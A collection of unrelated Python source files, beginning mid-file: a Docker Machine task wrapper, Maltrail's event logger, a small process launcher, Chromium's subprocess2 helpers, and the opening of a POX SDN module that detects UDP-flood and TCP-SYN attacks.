self._logger.debug("polling ...")
self._process_output(stdout_queue, stderr_queue)
self._returncode = self._process.poll()
# check process status
if self._returncode is not None:
if self._returncode == 0 or self._allowed_to_fail:
self._finish_output(stdout_queue, stderr_queue)
# success - task callback to process output
if self._output_cb:
self._output_cb(os.linesep.join(self._output))
self._logger.debug("done")
break
else:
# failed - exception
self._logger.error("failed - return code %s!", self._returncode)
self._process.kill()
self._finish_output(stdout_queue, stderr_queue)
raise DockerMachineError(self, 'Task call failed - return code %s!' % self._returncode)
# check process timeout
if datetime.now() - self._popen_start_time > self._popen_timeout:
self._logger.error("timeout!")
self._process.kill()
self._finish_output(stdout_queue, stderr_queue)
raise DockerMachineError(self, 'Task call timeout.')
time.sleep(1)
class DockerMachine:
"""
Docker Machine CLI wrapper.
Manages docker machine provisioning, setup and tasks.
"""
def __init__(self, name='', cwd='./', config={}, user_env={}):
"""
:param name: str: machine name
:param cwd: path: machine working directory (in which processes will run)
:param config: dict: docker-machine config
        :param user_env: dict: user supplied environment variables
User supplied environment variables are combined with current OS environment
and then supplied to sub-process calls.
"""
self._name = name
self._cwd = cwd
self._config = config
self._logger = logging.getLogger(self._name)
self._machine_status = ''
self._machine_ip = ''
self._service_logs = None
self._os_env = os.environ.copy()
self._user_env = user_env.copy()
self._machine_env = {}
self._task_list = queue.Queue()
self._stdout_queue = queue.Queue()
self._stderr_queue = queue.Queue()
self._idle = True
threading.Thread(target=self._machine_thread, daemon=True).start()
# add first tasks to provision and setup machine
self.tskProvisionMachine()
self.tskStartMachine()
self.tskGetMachineIp()
self.tskGetMachineEnv()
self.tskGetMachineStatus()
def __str__(self):
return "Docker machine %s, %s, %s" % (self.name(), self.ip(), self.status())
def _parse_env_text(self, input):
"""
Parse 'export key="value"\n...' type multi-line strings and return updated environment dictionary.
"""
output = {}
lines = input.splitlines()
for line in lines:
if line.startswith('export'):
                line = line[len('export'):]
words = line.split('=')
if len(words) == 2:
key = words[0].strip(' ')
value = words[1].strip('\" ')
output[key] = value
return output
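    # Example of the text this parses (the shape `docker-machine env <name>` prints;
    # the values here are illustrative):
    #   export DOCKER_TLS_VERIFY="1"
    #   export DOCKER_HOST="tcp://192.0.2.10:2376"
    # yields {'DOCKER_TLS_VERIFY': '1', 'DOCKER_HOST': 'tcp://192.0.2.10:2376'}.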
def _machine_thread(self):
"""
Machine task thread (executes tasks queued with '_add_task').
"""
while True:
try:
task = self._task_list.get(timeout=1)
self._idle = False
try:
self._logger.info("calling task '%s' ...", task._name)
task.call(env=self.env(),
stdout_queue=self._stdout_queue,
stderr_queue=self._stderr_queue)
except Exception as ex:
self._logger.exception("failed to execute task '%s'!. [%s] %s", task._name, type(ex).__name__, str(ex))
self._task_list.task_done()
except queue.Empty:
self._logger.debug("waiting for tasks ...")
self._idle = True
def name(self):
"""
Returns machine name (read-only)
"""
return self._name
def config(self):
"""
Returns machine config (provides specific provisioning details; read-only)
"""
return self._config
def cwd(self):
"""
Returns local machine services working folder (docker-compose file location; read-only)
"""
return self._cwd
def ip(self):
"""
Returns the IP of the remote machine
"""
return self._machine_ip
def env(self):
"""
Returns the ENV vars of the remote machine
"""
return {
**self._os_env,
**self._user_env,
**self._machine_env
}
def status(self):
"""
Returns the current status of the machine
"""
return self._machine_status
def logs(self):
return self._service_logs
def add_task(self, task):
"""
Machine task execution thread
"""
self._task_list.put(task)
def wait(self):
"""
Blocks caller until all scheduled tasks have finished
"""
self._task_list.join()
def busy(self):
return not self._idle
def tskProvisionMachine(self, allowed_to_fail=True):
"""
Schedule task to provision remote machine
"""
params = []
for key, value in self._config.items():
params.append('--' + key)
params.append(value)
params.append(self.name())
self.add_task(DockerMachineTask(name='provisionMachine',
cwd=self.cwd(),
cmd='create',
params=params,
allowed_to_fail=allowed_to_fail))
def tskStartMachine(self, allowed_to_fail=True):
"""
Schedule task to start remote machine
"""
self.add_task(DockerMachineTask(name='startMachine',
cwd=self.cwd(),
cmd='start',
params=[self.name()],
allowed_to_fail=allowed_to_fail))
def tskStopMachine(self, allowed_to_fail=True):
"""
Schedule task to stop remote machine
"""
self.add_task(DockerMachineTask(name='stopMachine',
cwd=self.cwd(),
cmd='stop',
params=[self.name()],
allowed_to_fail=allowed_to_fail))
def tskKillMachine(self, allowed_to_fail=True):
"""
Schedule task to stop remote machine (forces stop)
"""
self.add_task(DockerMachineTask(name='killMachine',
cwd=self.cwd(),
cmd='kill',
params=[self.name()],
allowed_to_fail=allowed_to_fail))
def tskRemoveMachine(self):
"""
Schedule task to completely remove machine locally and remotely
"""
self.add_task(DockerMachineTask(name='removeMachine',
cwd=self.cwd(),
cmd='rm',
params=['-f', '-y', self.name()]))
def tskGetMachineEnv(self):
"""
Schedule task to get remote machine environment
"""
def cb(text):
self._machine_env = self._parse_env_text(input=text)
self.add_task(DockerMachineTask(name='getMachineEnv',
cwd=self.cwd(),
cmd='env',
params=[self.name()],
output_cb=cb))
def tskGetMachineStatus(self):
"""
Schedule task to get remote machine status
"""
def cb(text):
self._machine_status = text
self.add_task(DockerMachineTask(name='getMachineStatus',
cwd=self.cwd(),
cmd='status',
params=[self.name()],
output_cb=cb))
def tskGetMachineIp(self):
"""
Schedule task to get remote machine IP
"""
def cb(text):
self._machine_ip = text
self.add_task(DockerMachineTask(name='getMachineIp',
cwd=self.cwd(),
cmd='ip',
params=[self.name()],
output_cb=cb))
def tskSecureCopyToMachine(self, src, dst):
"""
Schedule secure copy task
"""
self.add_task(DockerMachineTask(name='secureCopy',
cwd=self.cwd(),
cmd='scp',
params=['-r', src, self.name() + ':' + dst]))
def tskSecureCopyFromMachine(self, src, dst):
"""
Schedule secure copy task
"""
self.add_task(DockerMachineTask(name='secureCopy',
cwd=self.cwd(),
cmd='scp',
params=['-r', self.name() + ':' + src, dst]))
def tskRunServices(self, timeout=None):
"""
Schedule task to run remote machine services (docker-compose up)
"""
self.add_task(DockerMachineTask(name='runServices',
cwd=self.cwd(),
bin='docker-compose',
cmd='up',
params=[],
timeout=timeout))
def tskStartServices(self):
"""
Schedule task to run remote machine services in background (docker-compose up -d)
"""
self.add_task(DockerMachineTask(name='startServices',
cwd=self.cwd(),
bin='docker-compose',
cmd='up',
params=['-d']))
def tskGetServiceLogs(self):
"""
Schedule task to get remote machine service logs
"""
def cb(text):
self._service_logs = text
self.add_task(DockerMachineTask(name='getServiceLogs',
cwd=self.cwd(),
bin='docker-compose',
cmd='logs',
params=['--tail=256'],
output_cb=cb))
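# Rough usage sketch (machine name, driver and config values are illustrative only):
#   machine = DockerMachine(name='build-01', cwd='./services',
#                           config={'driver': 'generic', 'generic-ip-address': '192.0.2.10'})
#   machine.wait()                 # block until the initial provision/start/env tasks finish
#   machine.tskStartServices()     # docker-compose up -d using the machine's environment
#   machine.tskGetServiceLogs()
#   machine.wait()
#   print(machine.logs())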
|
log.py
|
#!/usr/bin/env python
"""
Copyright (c) 2014-2019 Maltrail developers (https://github.com/stamparm/maltrail/)
See the file 'LICENSE' for copying permission
"""
from __future__ import print_function
import datetime
import os
import re
import signal
import socket
import sys
import threading
import time
import traceback
from core.common import check_whitelisted
from core.common import check_sudo
from core.compat import xrange
from core.enums import TRAIL
from core.settings import CEF_FORMAT
from core.settings import config
from core.settings import CONDENSE_ON_INFO_KEYWORDS
from core.settings import CONDENSED_EVENTS_FLUSH_PERIOD
from core.settings import DEFAULT_ERROR_LOG_PERMISSIONS
from core.settings import DEFAULT_EVENT_LOG_PERMISSIONS
from core.settings import HOSTNAME
from core.settings import NAME
from core.settings import TIME_FORMAT
from core.settings import UNICODE_ENCODING
from core.settings import VERSION
from core.ignore import ignore_event
from thirdparty.six.moves import socketserver as _socketserver
_condensed_events = {}
_condensing_thread = None
_condensing_lock = threading.Lock()
_thread_data = threading.local()
def create_log_directory():
if not os.path.isdir(config.LOG_DIR):
if not config.DISABLE_CHECK_SUDO and check_sudo() is False:
exit("[!] please rerun with sudo/Administrator privileges")
os.makedirs(config.LOG_DIR, 0o755)
print("[i] using '%s' for log storage" % config.LOG_DIR)
def get_event_log_handle(sec, flags=os.O_APPEND | os.O_CREAT | os.O_WRONLY, reuse=True):
retval = None
localtime = time.localtime(sec)
_ = os.path.join(config.LOG_DIR, "%d-%02d-%02d.log" % (localtime.tm_year, localtime.tm_mon, localtime.tm_mday))
if not reuse:
if not os.path.exists(_):
open(_, "w+").close()
os.chmod(_, DEFAULT_EVENT_LOG_PERMISSIONS)
retval = os.open(_, flags)
else:
if _ != getattr(_thread_data, "event_log_path", None):
if getattr(_thread_data, "event_log_handle", None):
try:
os.close(_thread_data.event_log_handle)
except OSError:
pass
if not os.path.exists(_):
open(_, "w+").close()
os.chmod(_, DEFAULT_EVENT_LOG_PERMISSIONS)
_thread_data.event_log_path = _
_thread_data.event_log_handle = os.open(_thread_data.event_log_path, flags)
retval = _thread_data.event_log_handle
return retval
def get_error_log_handle(flags=os.O_APPEND | os.O_CREAT | os.O_WRONLY):
if not hasattr(_thread_data, "error_log_handle"):
_ = os.path.join(config.get("LOG_DIR") or os.curdir, "error.log")
if not os.path.exists(_):
open(_, "w+").close()
os.chmod(_, DEFAULT_ERROR_LOG_PERMISSIONS)
_thread_data.error_log_path = _
_thread_data.error_log_handle = os.open(_thread_data.error_log_path, flags)
return _thread_data.error_log_handle
def safe_value(value):
retval = str(value or '-')
if any(_ in retval for _ in (' ', '"')):
retval = "\"%s\"" % retval.replace('"', '""')
retval = re.sub(r"[\x0a\x0d]", " ", retval)
return retval
def flush_condensed_events():
while True:
time.sleep(CONDENSED_EVENTS_FLUSH_PERIOD)
with _condensing_lock:
for key in _condensed_events:
condensed = False
events = _condensed_events[key]
first_event = events[0]
condensed_event = [_ for _ in first_event]
for i in xrange(1, len(events)):
current_event = events[i]
for j in xrange(3, 7): # src_port, dst_ip, dst_port, proto
if current_event[j] != condensed_event[j]:
condensed = True
if not isinstance(condensed_event[j], set):
condensed_event[j] = set((condensed_event[j],))
condensed_event[j].add(current_event[j])
if condensed:
for i in xrange(len(condensed_event)):
if isinstance(condensed_event[i], set):
condensed_event[i] = ','.join(str(_) for _ in sorted(condensed_event[i]))
log_event(condensed_event, skip_condensing=True)
_condensed_events.clear()
def log_event(event_tuple, packet=None, skip_write=False, skip_condensing=False):
global _condensing_thread
if _condensing_thread is None:
_condensing_thread = threading.Thread(target=flush_condensed_events)
_condensing_thread.daemon = True
_condensing_thread.start()
try:
sec, usec, src_ip, src_port, dst_ip, dst_port, proto, trail_type, trail, info, reference = event_tuple
if ignore_event(event_tuple):
return
if not (any(check_whitelisted(_) for _ in (src_ip, dst_ip)) and trail_type != TRAIL.DNS): # DNS requests/responses can't be whitelisted based on src_ip/dst_ip
if not skip_write:
localtime = "%s.%06d" % (time.strftime(TIME_FORMAT, time.localtime(int(sec))), usec)
if not skip_condensing:
if any(_ in info for _ in CONDENSE_ON_INFO_KEYWORDS):
with _condensing_lock:
key = (src_ip, trail)
if key not in _condensed_events:
_condensed_events[key] = []
_condensed_events[key].append(event_tuple)
return
current_bucket = sec // config.PROCESS_COUNT
if getattr(_thread_data, "log_bucket", None) != current_bucket: # log throttling
_thread_data.log_bucket = current_bucket
_thread_data.log_trails = set()
else:
if any(_ in _thread_data.log_trails for _ in ((src_ip, trail), (dst_ip, trail))):
return
else:
_thread_data.log_trails.add((src_ip, trail))
_thread_data.log_trails.add((dst_ip, trail))
event = "%s %s %s\n" % (safe_value(localtime), safe_value(config.SENSOR_NAME), " ".join(safe_value(_) for _ in event_tuple[2:]))
if not config.DISABLE_LOCAL_LOG_STORAGE:
handle = get_event_log_handle(sec)
os.write(handle, event.encode(UNICODE_ENCODING))
if config.LOG_SERVER:
if config.LOG_SERVER.count(':') > 1:
remote_host, remote_port = config.LOG_SERVER.replace('[', '').replace(']', '').rsplit(':', 1)
# Reference: https://github.com/squeaky-pl/zenchmarks/blob/master/vendor/twisted/internet/tcp.py
_AI_NUMERICSERV = getattr(socket, "AI_NUMERICSERV", 0)
_NUMERIC_ONLY = socket.AI_NUMERICHOST | _AI_NUMERICSERV
_address = socket.getaddrinfo(remote_host, int(remote_port) if str(remote_port or "").isdigit() else 0, 0, 0, 0, _NUMERIC_ONLY)[0][4]
else:
remote_host, remote_port = config.LOG_SERVER.split(':')
_address = (remote_host, int(remote_port))
s = socket.socket(socket.AF_INET if len(_address) == 2 else socket.AF_INET6, socket.SOCK_DGRAM)
s.sendto(("%s %s" % (sec, event)).encode(UNICODE_ENCODING), _address)
if config.SYSLOG_SERVER:
extension = "src=%s spt=%s dst=%s dpt=%s trail=%s ref=%s" % (src_ip, src_port, dst_ip, dst_port, trail, reference)
_ = CEF_FORMAT.format(syslog_time=time.strftime("%b %d %H:%M:%S", time.localtime(int(sec))), host=HOSTNAME, device_vendor=NAME, device_product="sensor", device_version=VERSION, signature_id=time.strftime("%Y-%m-%d", time.localtime(os.path.getctime(config.TRAILS_FILE))), name=info, severity=0, extension=extension)
remote_host, remote_port = config.SYSLOG_SERVER.split(':')
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.sendto(_.encode(UNICODE_ENCODING), (remote_host, int(remote_port)))
if (config.DISABLE_LOCAL_LOG_STORAGE and not any((config.LOG_SERVER, config.SYSLOG_SERVER))) or config.console:
sys.stderr.write(event)
sys.stderr.flush()
if config.plugin_functions:
for _ in config.plugin_functions:
_(event_tuple, packet)
except (OSError, IOError):
if config.SHOW_DEBUG:
traceback.print_exc()
def log_error(msg):
try:
handle = get_error_log_handle()
os.write(handle, ("%s %s\n" % (time.strftime(TIME_FORMAT, time.localtime()), msg)).encode(UNICODE_ENCODING))
except (OSError, IOError):
if config.SHOW_DEBUG:
traceback.print_exc()
def start_logd(address=None, port=None, join=False):
class ThreadingUDPServer(_socketserver.ThreadingMixIn, _socketserver.UDPServer):
pass
class UDPHandler(_socketserver.BaseRequestHandler):
def handle(self):
try:
data, _ = self.request
if data[0:1].isdigit(): # Note: regular format with timestamp in front
sec, event = data.split(b' ', 1)
else: # Note: naive format without timestamp in front
event_date = datetime.datetime.strptime(data[1:data.find(b'.')].decode(UNICODE_ENCODING), TIME_FORMAT)
sec = int(time.mktime(event_date.timetuple()))
event = data
if not event.endswith(b'\n'):
event = b"%s\n" % event
handle = get_event_log_handle(int(sec), reuse=False)
os.write(handle, event)
os.close(handle)
except:
if config.SHOW_DEBUG:
traceback.print_exc()
# IPv6 support
if ':' in (address or ""):
address = address.strip("[]")
_socketserver.UDPServer.address_family = socket.AF_INET6
# Reference: https://github.com/squeaky-pl/zenchmarks/blob/master/vendor/twisted/internet/tcp.py
_AI_NUMERICSERV = getattr(socket, "AI_NUMERICSERV", 0)
_NUMERIC_ONLY = socket.AI_NUMERICHOST | _AI_NUMERICSERV
_address = socket.getaddrinfo(address, int(port) if str(port or "").isdigit() else 0, 0, 0, 0, _NUMERIC_ONLY)[0][4]
else:
_address = (address or '', int(port) if str(port or "").isdigit() else 0)
server = ThreadingUDPServer(_address, UDPHandler)
print("[i] running UDP server at '%s:%d'" % (server.server_address[0], server.server_address[1]))
if join:
server.serve_forever()
else:
thread = threading.Thread(target=server.serve_forever)
thread.daemon = True
thread.start()
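# Sketch of a client-side event sent to the UDP server above (address and port are illustrative;
# the payload mirrors what log_event() emits when config.LOG_SERVER is set):
#   import socket
#   s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
#   s.sendto(b"1546300800 2019-01-01 00:00:00.000000 sensor ...", ("127.0.0.1", 8337))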
def set_sigterm_handler():
def handler(signum, frame):
log_error("SIGTERM")
raise SystemExit
if hasattr(signal, "SIGTERM"):
signal.signal(signal.SIGTERM, handler)
if __name__ != "__main__":
set_sigterm_handler()
|
main.py
|
from multiprocessing import Process
import api
import reisapi
if __name__ == '__main__':
# Start API
    api_process = Process(target=api.run)
    api_process.start()
    reis = Process(target=reisapi.run)
    reis.start()
    api_process.join()
    reis.join()
|
subprocess2.py
|
# coding=utf8
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Collection of subprocess wrapper functions.
In theory you shouldn't need anything else in subprocess, or this module failed.
"""
import codecs
import errno
import io
import logging
import os
try:
import Queue
except ImportError: # For Py3 compatibility
import queue as Queue
import subprocess
import sys
import time
import threading
# Cache the string-escape codec to ensure subprocess can find it later.
# See crbug.com/912292#c2 for context.
if sys.version_info.major == 2:
codecs.lookup('string-escape')
# TODO(crbug.com/953884): Remove this when python3 migration is done.
try:
basestring
except NameError:
# pylint: disable=redefined-builtin
basestring = str
# Constants forwarded from subprocess.
PIPE = subprocess.PIPE
STDOUT = subprocess.STDOUT
# Sends stdout or stderr to os.devnull.
VOID = object()
# Error code when a process was killed because it timed out.
TIMED_OUT = -2001
# Globals.
# Set to True if you somehow need to disable this hack.
SUBPROCESS_CLEANUP_HACKED = False
class CalledProcessError(subprocess.CalledProcessError):
"""Augment the standard exception with more data."""
def __init__(self, returncode, cmd, cwd, stdout, stderr):
super(CalledProcessError, self).__init__(returncode, cmd, output=stdout)
self.stdout = self.output # for backward compatibility.
self.stderr = stderr
self.cwd = cwd
def __str__(self):
out = 'Command %r returned non-zero exit status %s' % (
' '.join(self.cmd), self.returncode)
if self.cwd:
out += ' in ' + self.cwd
return '\n'.join(filter(None, (out, self.stdout, self.stderr)))
class CygwinRebaseError(CalledProcessError):
"""Occurs when cygwin's fork() emulation fails due to rebased dll."""
## Utility functions
def kill_pid(pid):
"""Kills a process by its process id."""
try:
# Unable to import 'module'
# pylint: disable=no-member,F0401
import signal
return os.kill(pid, signal.SIGKILL)
except ImportError:
pass
def kill_win(process):
"""Kills a process with its windows handle.
Has no effect on other platforms.
"""
try:
# Unable to import 'module'
# pylint: disable=import-error
import win32process
# Access to a protected member _handle of a client class
# pylint: disable=protected-access
return win32process.TerminateProcess(process._handle, -1)
except ImportError:
pass
def add_kill():
"""Adds kill() method to subprocess.Popen for python <2.6"""
if hasattr(subprocess.Popen, 'kill'):
return
if sys.platform == 'win32':
subprocess.Popen.kill = kill_win
else:
subprocess.Popen.kill = lambda process: kill_pid(process.pid)
def hack_subprocess():
"""subprocess functions may throw exceptions when used in multiple threads.
See http://bugs.python.org/issue1731717 for more information.
"""
global SUBPROCESS_CLEANUP_HACKED
if not SUBPROCESS_CLEANUP_HACKED and threading.activeCount() != 1:
# Only hack if there is ever multiple threads.
# There is no point to leak with only one thread.
subprocess._cleanup = lambda: None
SUBPROCESS_CLEANUP_HACKED = True
def get_english_env(env):
"""Forces LANG and/or LANGUAGE to be English.
Forces encoding to utf-8 for subprocesses.
Returns None if it is unnecessary.
"""
if sys.platform == 'win32':
return None
env = env or os.environ
# Test if it is necessary at all.
is_english = lambda name: env.get(name, 'en').startswith('en')
if is_english('LANG') and is_english('LANGUAGE'):
return None
# Requires modifications.
env = env.copy()
def fix_lang(name):
if not is_english(name):
env[name] = 'en_US.UTF-8'
fix_lang('LANG')
fix_lang('LANGUAGE')
return env
class NagTimer(object):
"""
Triggers a callback when a time interval passes without an event being fired.
For example, the event could be receiving terminal output from a subprocess;
and the callback could print a warning to stderr that the subprocess appeared
to be hung.
"""
def __init__(self, interval, cb):
self.interval = interval
self.cb = cb
self.timer = threading.Timer(self.interval, self.fn)
self.last_output = self.previous_last_output = 0
def start(self):
self.last_output = self.previous_last_output = time.time()
self.timer.start()
def event(self):
self.last_output = time.time()
def fn(self):
now = time.time()
if self.last_output == self.previous_last_output:
self.cb(now - self.previous_last_output)
# Use 0.1 fudge factor, just in case
# (self.last_output - now) is very close to zero.
sleep_time = (self.last_output - now - 0.1) % self.interval
self.previous_last_output = self.last_output
self.timer = threading.Timer(sleep_time + 0.1, self.fn)
self.timer.start()
def cancel(self):
self.timer.cancel()
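# Minimal standalone sketch of NagTimer (the callback body is illustrative):
#   nag = NagTimer(30, lambda elapsed: sys.stderr.write('no output for %.0fs\n' % elapsed))
#   nag.start()
#   ... call nag.event() each time the watched process produces output ...
#   nag.cancel()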
class Popen(subprocess.Popen):
"""Wraps subprocess.Popen() with various workarounds.
- Forces English output since it's easier to parse the stdout if it is always
in English.
- Sets shell=True on windows by default. You can override this by forcing
shell parameter to a value.
- Adds support for VOID to not buffer when not needed.
- Adds self.start property.
Note: Popen() can throw OSError when cwd or args[0] doesn't exist. Translate
exceptions generated by cygwin when it fails trying to emulate fork().
"""
# subprocess.Popen.__init__() is not threadsafe; there is a race between
# creating the exec-error pipe for the child and setting it to CLOEXEC during
# which another thread can fork and cause the pipe to be inherited by its
# descendents, which will cause the current Popen to hang until all those
# descendents exit. Protect this with a lock so that only one fork/exec can
# happen at a time.
popen_lock = threading.Lock()
def __init__(self, args, **kwargs):
# Make sure we hack subprocess if necessary.
hack_subprocess()
add_kill()
env = get_english_env(kwargs.get('env'))
if env:
kwargs['env'] = env
if kwargs.get('shell') is None:
# *Sigh*: Windows needs shell=True, or else it won't search %PATH% for
# the executable, but shell=True makes subprocess on Linux fail when it's
# called with a list because it only tries to execute the first item in
# the list.
kwargs['shell'] = bool(sys.platform=='win32')
if isinstance(args, basestring):
tmp_str = args
elif isinstance(args, (list, tuple)):
tmp_str = ' '.join(args)
else:
raise CalledProcessError(None, args, kwargs.get('cwd'), None, None)
if kwargs.get('cwd', None):
tmp_str += '; cwd=%s' % kwargs['cwd']
logging.debug(tmp_str)
self.stdout_cb = None
self.stderr_cb = None
self.stdin_is_void = False
self.stdout_is_void = False
self.stderr_is_void = False
self.cmd_str = tmp_str
if kwargs.get('stdin') is VOID:
kwargs['stdin'] = open(os.devnull, 'r')
self.stdin_is_void = True
for stream in ('stdout', 'stderr'):
if kwargs.get(stream) in (VOID, os.devnull):
kwargs[stream] = open(os.devnull, 'w')
setattr(self, stream + '_is_void', True)
if callable(kwargs.get(stream)):
setattr(self, stream + '_cb', kwargs[stream])
kwargs[stream] = PIPE
self.start = time.time()
self.timeout = None
self.nag_timer = None
self.nag_max = None
self.shell = kwargs.get('shell', None)
# Silence pylint on MacOSX
self.returncode = None
try:
with self.popen_lock:
super(Popen, self).__init__(args, **kwargs)
except OSError as e:
if e.errno == errno.EAGAIN and sys.platform == 'cygwin':
# Convert fork() emulation failure into a CygwinRebaseError().
raise CygwinRebaseError(
e.errno,
args,
kwargs.get('cwd'),
None,
'Visit '
'http://code.google.com/p/chromium/wiki/CygwinDllRemappingFailure '
'to learn how to fix this error; you need to rebase your cygwin '
'dlls')
# Popen() can throw OSError when cwd or args[0] doesn't exist.
raise OSError('Execution failed with error: %s.\n'
'Check that %s or %s exist and have execution permission.'
% (str(e), kwargs.get('cwd'), args[0]))
def _tee_threads(self, input): # pylint: disable=redefined-builtin
"""Does I/O for a process's pipes using threads.
It's the simplest and slowest implementation. Expect very slow behavior.
If there is a callback and it doesn't keep up with the calls, the timeout
effectiveness will be delayed accordingly.
"""
# Queue of either of <threadname> when done or (<threadname>, data). In
# theory we would like to limit to ~64kb items to not cause large memory
# usage when the callback blocks. It is not done because it slows down
# processing on OSX10.6 by a factor of 2x, making it even slower than
# Windows! Revisit this decision if it becomes a problem, e.g. crash
# because of memory exhaustion.
queue = Queue.Queue()
done = threading.Event()
nag = None
def write_stdin():
try:
stdin_io = io.BytesIO(input)
while True:
data = stdin_io.read(1024)
if data:
self.stdin.write(data)
else:
self.stdin.close()
break
finally:
queue.put('stdin')
def _queue_pipe_read(pipe, name):
"""Queues characters read from a pipe into a queue."""
try:
while True:
data = pipe.read(1)
if not data:
break
if nag:
nag.event()
queue.put((name, data))
finally:
queue.put(name)
def timeout_fn():
try:
done.wait(self.timeout)
finally:
queue.put('timeout')
def wait_fn():
try:
self.wait()
finally:
queue.put('wait')
# Starts up to 5 threads:
# Wait for the process to quit
# Read stdout
# Read stderr
# Write stdin
# Timeout
threads = {
'wait': threading.Thread(target=wait_fn),
}
if self.timeout is not None:
threads['timeout'] = threading.Thread(target=timeout_fn)
if self.stdout_cb:
threads['stdout'] = threading.Thread(
target=_queue_pipe_read, args=(self.stdout, 'stdout'))
if self.stderr_cb:
threads['stderr'] = threading.Thread(
target=_queue_pipe_read, args=(self.stderr, 'stderr'))
if input:
threads['stdin'] = threading.Thread(target=write_stdin)
elif self.stdin:
# Pipe but no input, make sure it's closed.
self.stdin.close()
    for t in threads.values():
t.start()
if self.nag_timer:
def _nag_cb(elapsed):
logging.warn(' No output for %.0f seconds from command:' % elapsed)
logging.warn(' %s' % self.cmd_str)
if (self.nag_max and
int('%.0f' % (elapsed / self.nag_timer)) >= self.nag_max):
queue.put('timeout')
done.set() # Must do this so that timeout thread stops waiting.
nag = NagTimer(self.nag_timer, _nag_cb)
nag.start()
timed_out = False
try:
# This thread needs to be optimized for speed.
while threads:
item = queue.get()
if item[0] == 'stdout':
self.stdout_cb(item[1])
elif item[0] == 'stderr':
self.stderr_cb(item[1])
else:
# A thread terminated.
if item in threads:
threads[item].join()
del threads[item]
if item == 'wait':
# Terminate the timeout thread if necessary.
done.set()
elif item == 'timeout' and not timed_out and self.poll() is None:
logging.debug('Timed out after %.0fs: killing' % (
time.time() - self.start))
self.kill()
timed_out = True
finally:
# Stop the threads.
done.set()
if nag:
nag.cancel()
if 'wait' in threads:
# Accelerate things, otherwise it would hang until the child process is
# done.
logging.debug('Killing child because of an exception')
self.kill()
# Join threads.
      for thread in threads.values():
thread.join()
if timed_out:
self.returncode = TIMED_OUT
# pylint: disable=arguments-differ,W0622
def communicate(self, input=None, timeout=None, nag_timer=None,
nag_max=None):
"""Adds timeout and callbacks support.
Returns (stdout, stderr) like subprocess.Popen().communicate().
- The process will be killed after |timeout| seconds and returncode set to
TIMED_OUT.
- If the subprocess runs for |nag_timer| seconds without producing terminal
output, print a warning to stderr.
"""
self.timeout = timeout
self.nag_timer = nag_timer
self.nag_max = nag_max
if (not self.timeout and not self.nag_timer and
not self.stdout_cb and not self.stderr_cb):
return super(Popen, self).communicate(input)
if self.timeout and self.shell:
raise TypeError(
'Using timeout and shell simultaneously will cause a process leak '
'since the shell will be killed instead of the child process.')
stdout = None
stderr = None
# Convert to a lambda to workaround python's deadlock.
# http://docs.python.org/library/subprocess.html#subprocess.Popen.wait
# When the pipe fills up, it would deadlock this process.
if self.stdout and not self.stdout_cb and not self.stdout_is_void:
stdout = []
self.stdout_cb = stdout.append
if self.stderr and not self.stderr_cb and not self.stderr_is_void:
stderr = []
self.stderr_cb = stderr.append
self._tee_threads(input)
if stdout is not None:
stdout = ''.join(stdout)
if stderr is not None:
stderr = ''.join(stderr)
return (stdout, stderr)
def communicate(args, timeout=None, nag_timer=None, nag_max=None, **kwargs):
"""Wraps subprocess.Popen().communicate() and add timeout support.
Returns ((stdout, stderr), returncode).
- The process will be killed after |timeout| seconds and returncode set to
TIMED_OUT.
- If the subprocess runs for |nag_timer| seconds without producing terminal
output, print a warning to stderr.
- Automatically passes stdin content as input so do not specify stdin=PIPE.
"""
stdin = kwargs.pop('stdin', None)
if stdin is not None:
if isinstance(stdin, basestring):
# When stdin is passed as an argument, use it as the actual input data and
# set the Popen() parameter accordingly.
kwargs['stdin'] = PIPE
else:
kwargs['stdin'] = stdin
stdin = None
proc = Popen(args, **kwargs)
if stdin:
return proc.communicate(stdin, timeout, nag_timer), proc.returncode
else:
return proc.communicate(None, timeout, nag_timer), proc.returncode
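# Example (the command and timeout are illustrative):
#   (out, err), returncode = communicate(['git', 'status'], stdout=PIPE, stderr=PIPE, timeout=60)
#   if returncode == TIMED_OUT:
#     ...  # the child was killed after 60 seconds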
def call(args, **kwargs):
"""Emulates subprocess.call().
Automatically convert stdout=PIPE or stderr=PIPE to VOID.
In no case they can be returned since no code path raises
subprocess2.CalledProcessError.
"""
if kwargs.get('stdout') == PIPE:
kwargs['stdout'] = VOID
if kwargs.get('stderr') == PIPE:
kwargs['stderr'] = VOID
return communicate(args, **kwargs)[1]
def check_call_out(args, **kwargs):
"""Improved version of subprocess.check_call().
Returns (stdout, stderr), unlike subprocess.check_call().
"""
out, returncode = communicate(args, **kwargs)
if returncode:
raise CalledProcessError(
returncode, args, kwargs.get('cwd'), out[0], out[1])
return out
def check_call(args, **kwargs):
"""Emulate subprocess.check_call()."""
check_call_out(args, **kwargs)
return 0
def capture(args, **kwargs):
"""Captures stdout of a process call and returns it.
Returns stdout.
- Discards returncode.
- Blocks stdin by default if not specified since no output will be visible.
"""
kwargs.setdefault('stdin', VOID)
# Like check_output, deny the caller from using stdout arg.
return communicate(args, stdout=PIPE, **kwargs)[0][0]
def check_output(args, **kwargs):
"""Emulates subprocess.check_output().
Captures stdout of a process call and returns stdout only.
- Throws if return code is not 0.
- Works even prior to python 2.7.
- Blocks stdin by default if not specified since no output will be visible.
- As per doc, "The stdout argument is not allowed as it is used internally."
"""
kwargs.setdefault('stdin', VOID)
if 'stdout' in kwargs:
raise ValueError('stdout argument not allowed, it would be overridden.')
return check_call_out(args, stdout=PIPE, **kwargs)[0]
|
handle_flow.py
|
#!/usr/bin/python
# standard includes
from pox.core import core
import time as t
import pickle
import pandas as pd
import numpy as np
import threading
# import minisom
import local_outlier_factor as lof_alg
import detect_udp_attack
import detect_tcp_syn
import Backprop
import mode
# include as part of the betta branch
from pox.openflow.of_json import *
global packets, statistic, ip, count
packets = pd.DataFrame([])
count = 0
log = core.getLogger()
knn = detect_udp_attack.knn
tcp_syn = detect_tcp_syn.knn
parameters = Backprop.neural
mod = mode.mod
# handler for timer function that sends the requests to all the
# switches connected to the controller.
def _timer_func ():
for connection in core.openflow._connections.values():
connection.send(of.ofp_stats_request(body=of.ofp_flow_stats_request()))
log.debug("Sent %i flow/port stats request(s)", len(core.openflow._connections))
def calculate_Entropy(df):
# print("count=",count)
prob = df/df.sum(axis=0)
entropy = (-prob*np.log2(prob)).sum()
return entropy
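# Worked example (hypothetical per-source-IP packet counts):
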